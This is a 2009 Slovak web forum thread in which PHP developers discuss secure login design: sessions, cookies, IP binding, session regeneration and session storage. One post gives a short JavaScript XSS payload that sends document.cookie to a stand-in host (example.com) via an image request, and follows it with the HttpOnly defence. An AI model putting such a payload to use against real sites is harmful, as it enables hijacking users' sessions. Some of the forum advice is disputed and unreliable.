[ Príspevkov: 29 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 29.12.05
Prihlásený: 19.10.14
Príspevky: 539
Témy: 62 | 62
Bydlisko: 127.0.0.1 (...
NapísalOffline : 01.05.2009 1:45 | Bezpecne prihlasenie

Zdravim.
Mam otazku ohladom prihlasovania uzivatelov.
Jednoduchsie prihlasovanie ovladam, teraz mam zaujem o mozno zlozitejsie ale hlavne bezpecne prihlasenie. Neviem, ci mam pouzit Sessiony, alebo Cookies, popripade kombinaciu a akym stylom pouzit/kontrolovat a ako treba porovnavat IP adresu. Dalej neviem na co treba brat ohlad na ochranu proti XSS/SQL utokom (a ake opatrenia treba na skriptoch a formoch). A nakoniec ma zaujma ci treba pouzit unixstamp a porovnania nejakeho minuleho casu s aktualnym na zistenie platnosti. Viem, ze na vsetko toto treba brat ohlad a pouzit to (pokial poznate este nejaky prvok sem s nim) , ale neviem do akej miery a akym stylom. Jednotlive tieto casti zvladam, ale ma zaujima ake je optimalna kombinacia vsetkych tychto (a dalsich) prvkov
Prihlasovanie chcem normalne email-heslo cez form, ziadne http auth.
Diky


_________________
"Kde končí hiphop, začína IQ."
Offline

Skúsený užívateľ
Skúsený užívateľ
Obrázok užívateľa

Registrovaný: 13.11.07
Prihlásený: 20.08.16
Príspevky: 1719
Témy: 0 | 0
NapísalOffline : 01.05.2009 2:05 | Bezpecne prihlasenie

Na prihlasovanie na 99,99% tie session použiješ. Otázne je len to, akým spôsobom si prenesieš session id (či využiješ cookie, alebo niečo iné). ;)

Každopádne najskôr by si si mal niečo o tom nájsť a prečítať si to (napr. aj na tomto fóre).


Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 10.02.08
Prihlásený: 15.05.17
Príspevky: 2270
Témy: 48 | 48
Bydlisko: Nitra
NapísalOffline : 01.05.2009 10:08 | Bezpecne prihlasenie

Po spravnom prihlaseni ulozis do session povedzme nick a premennu prihlaseny s hodnotou ano. Kazdy script ti bude zacinat overenim, ci sa v session nachadza nick a prihlaseny s hodnotou ano, ked nie, ma dany uzivatel smolu. Toto bohate staci. Cookies mozes vyuzit max. na to, aby sa do policok nick a heslo pri logine automaticky vypisalo nick aj heslo, resp. aby sa uzivatel rovno prihlasoval, pokial je na rovnakom pocitaci, tak ako je to tu na fore :)

Co sa tyka IP, mozes ju dakde logovat, do dajakej tabulky v DB, ale je to fakt len na overenie, dneska moze mat kazdy IP aku ste :D S utokmi ty nic nenarobis, to je vec zabezpecenia serveru :)


_________________
WYSIWYMGIYRRLAAGW: What You See Is What You Might Get If You’re Really Really Lucky And All Goes Well.
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 01.05.2009 11:23 | Bezpecne prihlasenie

No tak IP kontrolovať je hlúposť. Cookies pri prihlásení ako takom tiež nevyužiješ (iba pri automatickom).

A teraz, do session si budeš zaznamenávať každý neúspešný pokus, pri istom počte mu zakážeš prihlasovanie (a môžeš uložiť aj do cookies). Po úspešnom prihlásení dáš: session_regenerate_id(), a uložíš si aj identifikátori do session aby si vedel či je prihlásený ...


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 04.04.07
Prihlásený: 20.11.17
Príspevky: 531
Témy: 34 | 34
Bydlisko: Bratislava
NapísalOffline : 01.05.2009 11:56 | Bezpecne prihlasenie

to kde si prisiel na taku somarinu, ze IP netreba kontrolovat? hovori ti nieco session stealing?


_________________
CPU: AMD Phenom II 940 QUAD X4 BE AM2+, chladic: Arctic Cooling Freezer 64 Pro, RAM: 4GB DDR2 800MHz PC6400, MB: M2N-E SLI, VGA: RX 4870 GAINWARD HD4870 1GB, HDD: WD 1TB, Zdroj: CORSAIR 750W TX
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.01.07
Prihlásený: 30.11.14
Príspevky: 660
Témy: 53 | 53
NapísalOffline : 01.05.2009 12:33 | Bezpecne prihlasenie

Kód:
A teraz, do session si budeš zaznamenávať každý neúspešný pokus, pri istom počte mu zakážeš prihlasovanie (a môžeš uložiť aj do cookies).


Ukladať veci do session nie je bezpečné. Podobne, ako píše djsulo.


Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 26.11.06
Prihlásený: 23.09.17
Príspevky: 4123
Témy: 317 | 317
Bydlisko: HE/BA
NapísalOffline : 01.05.2009 12:43 | Bezpecne prihlasenie

Kde sa ukladajú sessions? Na serveri alebo na klientovi?


_________________
Desktop: CASE: Cooler Master Centurion 532 MB: ASUS P5Q PRO Turbo CPU: Intel Core 2 Quad Q6600@2,4GHz FSB 1066MHz RAM: A-Data Vitesta 2×2GB 800MHz Cl 4-4-4-12 2T GPU: PowerColor PCS+ HD6950 HDD: Seagate Barracuda 500GB 7200rpm ODD1: LG DVD+/-RW + LS(PATA) ODD2:LG DVD+/-RW(SATA) PSU: LCD: DELL U2414M 24" 1920x1200
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.01.07
Prihlásený: 30.11.14
Príspevky: 660
Témy: 53 | 53
NapísalOffline : 01.05.2009 12:49 | Bezpecne prihlasenie

Na server, lenže pokiaľ ide o server, na ktorý sa pripájajú viacerí užívateľa, môže to predstavovať riziko.


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 26.02.08
Prihlásený: 24.05.13
Príspevky: 372
Témy: 66 | 66
Bydlisko: Nové Zámky
NapísalOffline : 01.05.2009 12:52 | Bezpecne prihlasenie

ake? ako sa to da zneuzit?


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.01.07
Prihlásený: 30.11.14
Príspevky: 660
Témy: 53 | 53
NapísalOffline : 01.05.2009 12:54 | Bezpecne prihlasenie

Niekde som čítal, že pokiaľ sa používa pre session na jednom serveri pre všetkých používateľov jeden dočasný priečinok, každý z užívateľov má prístup do tohto priečinka, a tak môže prečítať aj iné sessions.


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 04.04.07
Prihlásený: 20.11.17
Príspevky: 531
Témy: 34 | 34
Bydlisko: Bratislava
NapísalOffline : 01.05.2009 13:03 | Bezpecne prihlasenie

na niektorych serveroch, neviem ci na vsetkych, session idcka sa ukladaju do jedneho foldera, spolu s udajmi ktore session obsahuje.


_________________
CPU: AMD Phenom II 940 QUAD X4 BE AM2+, chladic: Arctic Cooling Freezer 64 Pro, RAM: 4GB DDR2 800MHz PC6400, MB: M2N-E SLI, VGA: RX 4870 GAINWARD HD4870 1GB, HDD: WD 1TB, Zdroj: CORSAIR 750W TX
Offline

Skúsený užívateľ
Skúsený užívateľ
Obrázok užívateľa

Registrovaný: 13.11.07
Prihlásený: 20.08.16
Príspevky: 1719
Témy: 0 | 0
NapísalOffline : 01.05.2009 15:05 | Bezpecne prihlasenie

pepek92 píše:
Niekde som čítal, že pokiaľ sa používa pre session na jednom serveri pre všetkých používateľov jeden dočasný priečinok, každý z užívateľov má prístup do tohto priečinka, a tak môže prečítať aj iné sessions.
Session si môžeš ukladať napr. do DB (alebo aj ako súbory, nemusíš používať "základný" spôsob, čo je v Php).

@Svolo Cookies môžeš využiť na ukladanie session id (a nie len na ukladanie mena...). ;)


Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 26.11.06
Prihlásený: 23.09.17
Príspevky: 4123
Témy: 317 | 317
Bydlisko: HE/BA
NapísalOffline : 01.05.2009 15:19 | Bezpecne prihlasenie

Ako zistím session ID?


_________________
Desktop: CASE: Cooler Master Centurion 532 MB: ASUS P5Q PRO Turbo CPU: Intel Core 2 Quad Q6600@2,4GHz FSB 1066MHz RAM: A-Data Vitesta 2×2GB 800MHz Cl 4-4-4-12 2T GPU: PowerColor PCS+ HD6950 HDD: Seagate Barracuda 500GB 7200rpm ODD1: LG DVD+/-RW + LS(PATA) ODD2:LG DVD+/-RW(SATA) PSU: LCD: DELL U2414M 24" 1920x1200
Offline

Skúsený užívateľ
Skúsený užívateľ
Bezpecne prihlasenie

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96
NapísalOffline : 01.05.2009 15:38 | Bezpecne prihlasenie

Rád by som sa zapojil do vašej debaty. Neviem, kde začať, tak bude písať ako mi prsty padnú na klávesnicu.
Ako funguje session (session.save_handler = files) - Na serveri sa ukladajú súbory so serializovanými premennými zo $_SESSION. Klientovi pošleme cookie (cez hlavičku), v ktorom má session id.
Keďže je to cookie, za bežných okolností sa dá ukradnúť cez obyčajné xss, príklad takého "útoku":
Kód:
a=document.createElement("img");
a.src="http://www.example.com/abc.php?"+document.cookie

Toto sa dá ošetriť nastavením v php.ini
Kód:
session.cookie_httponly = true

Ukladať session do db neodporúčam. Pokiaľ to nie je prepracované dostatočne, tak to spôsobí zas ďalšie problémy, možno ešte väčšie.
Čo tu niekto spomínal to, že k tomu súboru má prístup každý užívateľ (pokiaľ nie je nastavené inak), problém môže byť ak máte rovnaký hosting ako útočník. Môže si jednoducho nastaviť v cookies sessionid získané z vašej stránky a robiť tam zmeny.
Ale nemalo by to vadiť, pokiaľ paranoidne preverujete každú hodnotu, či už z cookies, session, post, get, files alebo z databázy. Pretože nikdy neviete, kto sa vám nabúra do ktorej vrstvy v systéme.

Ja robím ešte takú jednu somarinku, celkom to aj funguje, že v session si uložím premennú, v ktorej je hash z ip adresy, pevne daného stringu, http_host, user_agent a neviem čoho ešte všetkého.
Čiže ak niekto aj ukradne sessionid, tak mu to nepomôže, pretože nebude mať ten správny z týchto v podstate nemenných premenných.
Jeden problém, čo mi napadá je, že keď niekto surfuje na notebooku, zavre notebook a pripojí sa niekde inde, už bude mať inú IP, čiže mu zruším session...


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 26.02.08
Prihlásený: 24.05.13
Príspevky: 372
Témy: 66 | 66
Bydlisko: Nové Zámky
NapísalOffline : 10.05.2009 15:25 | Bezpecne prihlasenie

mno vyuzijem tento topic...chcem sa spytat...rozmysalm ze si budem nahodne generovat nejaky retazec...budem ho ukladat do tabulky k userovi...lenze otazka je ci prenasat retazec cez GET cookie alebo session....samozrejme pri overovani by som neoveroval iba ten retazec ale aj ine veci ako ip, cas kedy bol retazec vytvoreny (hash casu) napr prehliadac atd...len neviem kade prenasat ten retazec co by ste odporucali?


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 10.05.2009 19:04 | Bezpecne prihlasenie

djsulo píše:
to kde si prisiel na taku somarinu, ze IP netreba kontrolovat? hovori ti nieco session stealing?

Ty si kde prišiel na takú somarinu, že IP treba kontrolovať? (rovnako priblbá otázka). Dnes sa využívajú aj dynamické IPčky ... IP sa ti môže zmeniť kedykoľvek. Čiže je to neefektívne - nemá to zmysel ... malo by to zmysel keby boli IP statické.

pepek92: Nevrav :) Oveľa bezpečnejšie ako GET, POST či COOKIE

chrono: do DB ... nuž zaujímavý názor. DB je najpomalšia časť stránky. Určite, si nebudem ukladať session do DB z pretože:
1, musel by som vymyslieť fakt dobrý spôsob, ako to tam nejako logicky uložiť
2, nabúrať sa do DB je jednoduchšie ako nabúrať sa do SESSION
3, session pri istých podmienkách je skoro neukradnteľné (píšem skoro lebo nič nie je 100%)


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.01.07
Prihlásený: 30.11.14
Príspevky: 660
Témy: 53 | 53
NapísalOffline : 10.05.2009 19:10 | Bezpecne prihlasenie

Ak sa ti niekto nabúra do DB, tak či je alebo nie je tam session je už v podstate jedno.


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 04.04.07
Prihlásený: 20.11.17
Príspevky: 531
Témy: 34 | 34
Bydlisko: Bratislava
NapísalOffline : 10.05.2009 19:28 | Bezpecne prihlasenie

tominator: vidim ze ti to nic nehovori... myslim ze je najmensi problem, ked sa niekomu zmeni IP, tak sa prihlasi este raz, ako ked niekto odchyti jeho session a zneuzije ju, nemyslis?


_________________
CPU: AMD Phenom II 940 QUAD X4 BE AM2+, chladic: Arctic Cooling Freezer 64 Pro, RAM: 4GB DDR2 800MHz PC6400, MB: M2N-E SLI, VGA: RX 4870 GAINWARD HD4870 1GB, HDD: WD 1TB, Zdroj: CORSAIR 750W TX
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 10.05.2009 20:14 | Bezpecne prihlasenie

pepek92: to je pravda :)
djsulo: nie nič mi to nevraví ... myslím že to ani nič podstatné neznamená, lebo session je od IP nezávislé


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 04.04.07
Prihlásený: 20.11.17
Príspevky: 531
Témy: 34 | 34
Bydlisko: Bratislava
NapísalOffline : 10.05.2009 20:16 | Bezpecne prihlasenie

tak si najprv zisti o com hovorim


_________________
CPU: AMD Phenom II 940 QUAD X4 BE AM2+, chladic: Arctic Cooling Freezer 64 Pro, RAM: 4GB DDR2 800MHz PC6400, MB: M2N-E SLI, VGA: RX 4870 GAINWARD HD4870 1GB, HDD: WD 1TB, Zdroj: CORSAIR 750W TX
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 10.05.2009 20:21 | Bezpecne prihlasenie

djsulo píše:
tak si najprv zisti o com hovorim

Ty si zisti o čom hovoríš -> session stealing (voľný preklad: kradnutie session). Existuje niekoľko spôsobov, najpoužívanejší je XSS. Takže miesto všeobecného pomenovania skús použiť niečo konkrétne :)


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 04.04.07
Prihlásený: 20.11.17
Príspevky: 531
Témy: 34 | 34
Bydlisko: Bratislava
NapísalOffline : 10.05.2009 20:24 | Bezpecne prihlasenie

je to nato, ak ti niekto odchyti session a budes mat v nej ulozenu aj IP klienta, tak ju porovnas ci sedi, ak ti niekto ukradne session, v 99% pripadoch bude mat inu IP a session destroynes, uz je to jasne?


_________________
CPU: AMD Phenom II 940 QUAD X4 BE AM2+, chladic: Arctic Cooling Freezer 64 Pro, RAM: 4GB DDR2 800MHz PC6400, MB: M2N-E SLI, VGA: RX 4870 GAINWARD HD4870 1GB, HDD: WD 1TB, Zdroj: CORSAIR 750W TX
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 26.02.08
Prihlásený: 24.05.13
Príspevky: 372
Témy: 66 | 66
Bydlisko: Nové Zámky
NapísalOffline : 11.05.2009 18:18 | Bezpecne prihlasenie

mno moholi by ste reagovat aj na moju otazku :)


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 11.05.2009 19:03 | Bezpecne prihlasenie

Blackdevil píše:
ake? ako sa to da zneuzit?

Samozrejme ... veď keď získam tvoje session ID, tak sa budem tváriť ako ty -> t.j. budem prihlásený ako ty -> t.z. -> budem môcž čítať, mazať, upravovať


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 26.02.08
Prihlásený: 24.05.13
Príspevky: 372
Témy: 66 | 66
Bydlisko: Nové Zámky
NapísalOffline : 11.05.2009 19:10 | Bezpecne prihlasenie

myslel som na prvej strane posledny prispevok :) na tamten ste mi odpovedali :)


Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 27.11.08
Prihlásený: 08.07.17
Príspevky: 634
Témy: 98 | 98
Bydlisko: Veľký Krtíš...
NapísalOffline : 11.05.2009 20:42 | Bezpecne prihlasenie

Blackdevil píše:
myslel som na prvej strane posledny prispevok :) na tamten ste mi odpovedali :)

Tominator píše:
Ty si kde prišiel na takú somarinu, že IP treba kontrolovať? (rovnako priblbá otázka). Dnes sa využívajú aj dynamické IPčky ... IP sa ti môže zmeniť kedykoľvek. Čiže je to neefektívne - nemá to zmysel ... malo by to zmysel keby boli IP statické.

pepek92: Nevrav :) Oveľa bezpečnejšie ako GET, POST či COOKIE


chrono: do DB ... nuž zaujímavý názor. DB je najpomalšia časť stránky. Určite, si nebudem ukladať session do DB z pretože:
1, musel by som vymyslieť fakt dobrý spôsob, ako to tam nejako logicky uložiť
2, nabúrať sa do DB je jednoduchšie ako nabúrať sa do SESSION
3, session pri istých podmienkách je skoro neukradnteľné (píšem skoro lebo nič nie je 100%)


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 11.05.2009 22:05 | Bezpecne prihlasenie

Blackdevil píše:
mno vyuzijem tento topic...chcem sa spytat...rozmysalm ze si budem nahodne generovat nejaky retazec...budem ho ukladat do tabulky k userovi...lenze otazka je ci prenasat retazec cez GET cookie alebo session....samozrejme pri overovani by som neoveroval iba ten retazec ale aj ine veci ako ip, cas kedy bol retazec vytvoreny (hash casu) napr prehliadac atd...len neviem kade prenasat ten retazec co by ste odporucali?

Ako som už povedal, a NickVK prepojil, session je vhodná voľba.


Offline

Užívateľ
Užívateľ
Bezpecne prihlasenie

Registrovaný: 26.11.06
Prihlásený: 23.09.17
Príspevky: 4123
Témy: 317 | 317
Bydlisko: HE/BA
NapísalOffline : 12.05.2009 17:58 | Bezpecne prihlasenie

Tominator, úprimne pochybujem, že je jednoduchšie nabúrať sa do DB ako si ukradnúť SESSION.


_________________
Desktop: CASE: Cooler Master Centurion 532 MB: ASUS P5Q PRO Turbo CPU: Intel Core 2 Quad Q6600@2,4GHz FSB 1066MHz RAM: A-Data Vitesta 2×2GB 800MHz Cl 4-4-4-12 2T GPU: PowerColor PCS+ HD6950 HDD: Seagate Barracuda 500GB 7200rpm ODD1: LG DVD+/-RW + LS(PATA) ODD2:LG DVD+/-RW(SATA) PSU: LCD: DELL U2414M 24" 1920x1200
Offline

Čestný člen
Čestný člen
Bezpecne prihlasenie

Registrovaný: 17.10.06
Prihlásený: 08.01.11
Príspevky: 1757
Témy: 17 | 17
NapísalOffline : 12.05.2009 21:54 | Bezpecne prihlasenie

flety to zalezi od konkretneho pripadu. ak je web spraveny na chuja, obe veci su trivialne.


_________________
A Real Programmer might or might not know his wife's name. He does, however, know the entire ASCII code table.
 [ Príspevkov: 29 ] 


Bezpecne prihlasenie



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

Bezpečné WIFI

v Siete

13

349

25.10.2010 21:14

Daevid

V tomto fóre nie sú ďalšie neprečítané témy.

Bezpecne include ?

v PHP, ASP

2

240

20.03.2012 19:05

ewil

V tomto fóre nie sú ďalšie neprečítané témy.

Bezpečné taktnutie

v Biosy a ladenie výkonu

10

497

15.03.2009 21:48

shark777

V tomto fóre nie sú ďalšie neprečítané témy.

Bezpecne instalovanie aplikacii

v Ostatné programy

2

222

27.12.2010 16:23

Blackshadow

V tomto fóre nie sú ďalšie neprečítané témy.

bezpecne odstranenie usb

v Pevné disky a radiče

0

212

21.10.2013 11:41

MyschoVIP

V tomto fóre nie sú ďalšie neprečítané témy.

Bezpecne odstranenie hardweru

v Operačné systémy Microsoft

8

387

09.07.2009 14:30

GeeDeeI

V tomto fóre nie sú ďalšie neprečítané témy.

bezpečné vyčistenie disku

v Pevné disky a radiče

2

531

25.02.2011 20:52

Tech

V tomto fóre nie sú ďalšie neprečítané témy.

Nezobrazuje bezpečné odstránenie hardvéru.

v Ostatné

2

1431

16.12.2009 13:15

hnida01

V tomto fóre nie sú ďalšie neprečítané témy.

Externe HDD - bezpečné vytiahnutie

v Ostatné zariadenia

6

200

01.03.2017 21:44

4040

V tomto fóre nie sú ďalšie neprečítané témy.

ake je to bezpecne?

v Bezpečnosť a firewally

3

719

07.05.2006 18:59

Alyx_Vance

V tomto fóre nie sú ďalšie neprečítané témy.

zariadenie mozno bezpecne odstranit

v Ostatné

1

354

05.01.2010 21:46

SilverSurfer

V tomto fóre nie sú ďalšie neprečítané témy.

Teraz môžete bezpečne vypnúť počítač!

v Operačné systémy Microsoft

3

477

18.10.2008 14:55

dsljohn

V tomto fóre nie sú ďalšie neprečítané témy.

Jaké záplaty pro bezpečné surfování?

v Operačné systémy Microsoft

8

726

03.09.2005 8:28

ScorpionSX

V tomto fóre nie sú ďalšie neprečítané témy.

nefunguje mi bezpecne odstranenie USB

v Ostatné zariadenia

3

1893

08.02.2008 18:09

9tommy9

V tomto fóre nie sú ďalšie neprečítané témy.

Ako bezpecne zrusit email konto.

v Služby a webstránky

14

499

27.11.2013 23:06

Kraliček

V tomto fóre nie sú ďalšie neprečítané témy.

Disk e Sata - bezpečné odpojenie

v Pevné disky a radiče

7

445

18.01.2011 17:27

Xiao Zhuänjiä



© 2005 - 2017 PCforum, edited by JanoF